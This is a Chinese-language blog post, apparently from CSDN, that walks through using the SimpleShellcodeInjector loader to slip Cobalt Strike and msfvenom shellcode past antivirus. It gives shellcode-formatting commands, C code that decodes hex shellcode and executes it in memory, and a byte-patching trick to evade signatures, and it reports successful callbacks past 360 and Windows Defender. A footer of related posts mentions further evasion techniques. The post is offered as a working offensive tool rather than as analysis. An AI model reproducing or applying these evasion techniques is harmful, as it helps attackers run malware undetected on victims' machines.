文件进制反转_反转字符串绕杀软

最新推荐文章于 2023-05-15 17:45:48 发布
最新推荐文章于 2023-05-15 17:45:48 发布
阅读量181 收藏
点赞数
文章标签: 文件进制反转
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39743423/article/details/111576241
版权

在github有一个ssi的项目,项目地址如下:https://github.com/DimopoulosElias/SimpleShellcodeInjector/ 他可以实现shellcode的远程加载(十六进制),当然LDrakura也曾经搞过类似的项目(我偷电瓶车养你啊),当时还是一次项目时绕卡巴斯基的时候他丢我的。本文将简单介绍该项目的原理,并给出其他实现方法。

shellcode处理

首先需要处理shellcode,这里推荐使用kali直接处理,推荐下面的两种方法。

cat 1.txt | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

177d8231886b3a1fcc86b0ee0a9cd48c.png

或者

msfvenom -p windows/exec CMD=calc.exe -f raw | xxd -ps

ba9053932794dc6cee3b0a88a8a93192.png

cs的shellcode推荐第二种,如果是第一种,需要做一些调整操作,像下面这样:

9a6a8aae13ca4f6b1871f3fdb2168537.png

加载原理

加载器通过参数的方式传递hex的shellcode到加载器内,然后使用一些操作还原shellcode,这里有一些需要注意的点,比如数组的长度为1066,那么他就是由shellcode[0]=f到shellcode[1665]=7构成后面加上一个终止符,此时strlen(shellcode)=1666,sizeof(shellcode)=1667,所以在计算长度时便需要这样  x=(sizeof(shellcode) - 1) . or x= strlen(shellcode),因为每两个字节为一组,所以我们在分配内存时,需要进行除二操作,比如bytes = (sizeof(shellcode) - 1)/2  或者 bytes = strlen(shellcode)/2。

接下来便是还原shellcode的操作了

for(unsigned int i = 0; i< iterations-1; i++) {        sscanf(shellcode+2*i, "%2X", &char_in_hex);        shellcode[i] = (char)char_in_hex;    }

或者使用下面这样的方法:

void AsciiToHex(char * pAscii, unsigned char * pHex, int nLen) {   if (nLen % 2)             return;       int nHexLen = nLen / 2;       for (int i = 0; i < nHexLen; i++)       {             unsigned char Nibble[2];             Nibble[0] = *pAscii++;             Nibble[1] = *pAscii++;             for (int j = 0; j < 2; j++)             {                   if (Nibble[j] <= 'F' && Nibble[j] >= 'A')                         Nibble[j] = Nibble[j] - 'A' + 10;                   else if (Nibble[j] <= 'f' && Nibble[j] >= 'a')                         Nibble[j] = Nibble[j] - 'a' + 10;                   else if (Nibble[j] >= '0' && Nibble[j] <= '9')                         Nibble[j] = Nibble[j] - '0';                   else                         return;            }   // for (int j = ...)             pHex[i] = Nibble[0] << 4;   // Set the high nibble             pHex[i] |= Nibble[1];   //Set the low nibble       }   // for (int i = ...) }

然后剩下的便是分配内存、装入shellcode,作者使用的是

(*(void (*)()) exec)();

来进行最后的加载。

测试

明白原理之后,重新编译(原文件md5可能已被标记),使用360全家桶进行扫描:

0b39479654466ff80e46393adbd7608d.png

联网情况下是没有任何问题的,然后上线我们的cs试试:

acbd68ae16867450f64609423b891d66.png

可直接上线,注:x64的shellcode上线有问题,程序会崩溃。

修改

更改shellcode前几个字节,然后加载到内存更改回来,然后解密hex加载,并更改shellcode加载方式。

更改加载的方法之前也是发过的。

反转方式如下:

char first[] = "\xfc";memcpy(shellcode,fisrt,1);

加载方式如下:

typedef void (*some_func)();   some_func func = (some_func)exec;   func();

ps:只是更改了一个写法。

测试弹出计算器:

022621a79991961b89437efa5d3af067.png

windows defender上线测试:

33efc773a49edd9b121a7cd054dfce85.png

eb1e1d3a0e27835fb2425a2e95bdf78e.png

总结:

cs生成的shellcode过长,可想直接写入程序,程序下载地址:

https://github.com/lengjibo/RedTeamTools/tree/master/windows/SSI

欢迎star

weixin_39743423
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python小积累
pmt123456的博客
10-19 198
Reverse-it #读取文件,逆转,然后保存成图片 #注意hex和str的转换 #字符串逆转的3种方法https://www.cnblogs.com/fengff/p/10367136.html if __name__ == '__main__': filename = "C:/Users/Administrator/Desktop/tmp/0da9641b7aad4efb8f7eb45f47eaebb2" file = open(filename, 'rb') str =
xctf攻防世界 MISC高手进阶区 Reverse-it
l8947943的博客
01-18 5958
1.进入环境,下载附件 给的是一个无后缀的文件,用winhex打开如图: 关键词搜索后无果,考虑提示 2. 问题分析 1 反转 题目提示Reverse-it,那么该reverse什么?我们分析文件头,没有任何线索,分析文件尾部,发现倒序是以为FFD8FF的顺序,在文件比对页面https://blog.csdn.net/holandstone/article/details/7624343进行对比后,知道是JPEG (jpg)文件。 翻译题目的意思,就是将文件的二进制倒序后,存储成二进制文件就是答案。 代
青少年CTF Misc 刷题记录--------剧情大反转
weixin_45906533的博客
03-11 609
文件头识别 字节反转
十六进制文本颠倒发出来备用-易语言
06-11
写个程序用到了文本颠倒, 特意提出来发出来, 希望帮助有需要的人! 看图:
shellCode免技巧
qq_39330735的博客
05-15 2480
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对件的⼀种免⽅法,但是由于与免⼿法的定义 有出⼊,所以如果将国内免技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 ,在类似于免技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免技术,这为以后⽊⻢免 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
电子纸模块的实用工具。它可以将任何 jpg、bmp 或 png 转换为二进制十六进制数组_JavaScript_代码_下载
06-15
第二步是将所有创建的数字连接成一个字符串,并将其切成 8 位长度的部分。之后,它必须转换为特定的十六进制格式。(我认为这个解决方案背后的原因是模块的显示缓冲区有限,而且这种格式只是小到足以发送和处理数据...
进制转换工具 十六进制进制 unicode 正转 反转
02-04
- 在编程中,开发者经常需要进行进制转换,比如解析或生成二进制文件、处理网络协议数据、或者处理Unicode字符串。 - 在数据分析和信息安全领域,理解并能操作不同进制系统是至关重要的,例如在分析日志、解密密码...
浅析51个PHP处理字符串的函数
10-27
2. `bin2hex()`:将二进制字符串转换为十六进制表示,这对于数据的编码和解码非常有用。 3. `Chop()`(等同于`rtrim()`):删除字符串末尾的空白字符,如空格、换行符等。 4. `Chr()`:根据给定的ASCII值返回对应...
Python中字符串的常见操作技巧总结
09-21
本文将深入探讨Python中字符串的一些常见操作技巧,包括但不限于字符串反转、编码转换、进制转换以及一些实用的字符串处理方法。通过这些技巧的学习,可以帮助开发者更加高效地处理字符串相关的任务。 #### 一、...
文件反转、倒置的工具,解决CTF和生活中的文件处理问题
最新发布
12-29
在Web CTF挑战中,参赛者需要通过解析网站源代码、挖掘数据库、分析HTTP请求等方式找到隐藏的flag,这些flag通常是加密或混淆过的字符串文件反转和倒置工具可以作为一个重要的辅助手段,帮助参赛者从看似无关的...
SimpleShellcodeInjector:SimpleShellcodeInjector接收十六进制的shellcode作为参数并执行它。 它不会在第三方应用程序中注入shellcode
05-14
SimpleShellcodeInjector(SSI) 描述 SimpleShellcodeInjector或SSI接收十六进制的shellcode作为参数并执行它。 它不会将shellcode注入第三方应用程序中,并且对于诸如Get-InjectedThread之类的工具始终处于监视之下。 目前,即使您在不混淆的情况下执行了meterpreter的shellcode,许多防病毒解决方案也无法检测到它。 让我注意到,尽管您可以使用SSI来接收抄表器,但它不是metasploit的登台者。 它只是执行您提供的shellcode。 防病毒检测(比率:0/30) 经过积极测试 目前,它已经针对以下解决方案进行了积极测试(默认设置-完全更新),并且成功返回了反向抄表器: Windows Defender的 赛门铁克端点保护 卡巴斯基 ESET-Smart Security Premium(试用
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免性和隐匿性。 0x02 参考链接
hex的相关格式转换
leaforever_的博客
11-05 2836
最近做pyserial 串口一类的工作,总涉及hex字符串和bytes之间的转换,总结下贴在这里共勉: **1、**一开始搜索,使用decode()和encode()转换 a = 'a1b2c3d4e5f67890' a_bytes = a.decode('hex') print(a_bytes) 结果为: b'\xa1\xb2\xc3\xd4\xe5\xf6\x78\x90' 解为字符串: aa = a_bytes.encode('hex') print(aa) 结果为: a1b2c3d4e5f67
16进制串和16进制字符串的转换
架构师米洛
07-07 1239
我们知道在windows中,每个字符都可以用16进制表示,但是并不是所有字符都可以用string等表示出来,比如看看下面两个字符char buf[2] = {0x00,0x01}char buf2[2] = {0x30,0x31}那么用string转化后是什么结果?std::string(buf) 是个""std::string(buf2) 是"01"从底层收到了buf这种数据在界面展示会是乱码或...
C语言中HEX转ASCII函数,ASCII转HEX函数,ASCII转DEC函数,四字节大小端转换函数整理
热门推荐
u010761559的博客
10-29 1万+
人生第一次写博客,工作几年,现在才想起来应该写点东西留点纪念,亡羊补牢,犹未为晚吧,渐渐把一些重要知识点整理起来,万事开头难,所以第一篇就整理几个转换函数,项目开发中总结的,编写者不知呀╮(╯▽╰)╭,感谢无名者,已实际应用,这几个函数C语言中挺常用的,在单片机开发中也特别常用,特别是需要字符显示数据的时候,废话少说~~~~ 第一个,HEX转ASCII函数如下: char AsciiToHex(...
16进制串与ASCII字符串相互转换
weixin_30929295的博客
05-18 522
提供两个函数,方便十六进制串与ASCII 字符串之间的相互转换,使用函数需要注意的是返回的串是在堆上通过 calloc 分配的,所以,记得使用完返回值释放该块,并且将指向该块的指针 =NULL 。// 函数输入字符串,输出字符串对应的16进制串char *chstohex ( char* chs ){ char hex[16] = { '0', '1', '2', '3', '4', '5'...
ShellCode
weixin_46661122的博客
11-16 1050
关于利用图片Alpha通道隐写术隐藏Shellcode的攻击 Alpha通道,又叫做阿尔法通道,是指一张图片的透明和半透明度。例如:一个使用16位存储的图片,可能5位表示红色,5位表示绿色,5位表示蓝色,1位是阿尔法。在这种情况下,它要么表示透明要么不是。一个使用32位存储的图片,每8位表示红绿蓝,和阿尔法通道。在这种情况下,就不光可以表示透明还是不透明,阿尔法通道还可以表示256级的半透明度。 一般alpha值取0~1之间。通道分为三种通道。也就是有三个作用。 Alpha通道与Rgb图片为乘法运算即:图片
SimpleInjector 简单使用
weixin_30652491的博客
03-27 484
SimpleInjector 简单使用,未完待续 转载于:https://www.cnblogs.com/aresyl/p/6627372.html
shellcode分析过程中符号还原
weixin_42539095的博客
11-24 247
一.基本操作 在逆向分析的过程中涉及大量符号还原的部分,该部分主要介绍一些PE结构符号还原 通过 View->Open subviews->Type libraries 打开类型库窗口,可以看到当前 IDA 加载的类型库 View->Open subview->Structures 打开结构体窗口,可以看到 IDA 当前 的工程数据库中已经包含的所有标准和用户自定义的结构体信息 在结构体窗口中,Insert 键添加结构体,选择 add standard structure添加所需
PHP字符串处理函数全览
33. **strrev**: 反转字符串,用于倒序输出。 34. **strtr**: 替换字符串中的特定字符或子串。 35. **substr**: 提取字符串的子串,可以指定开始位置和长度。 这些函数构成了PHP处理字符串的强大工具箱,无论是在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值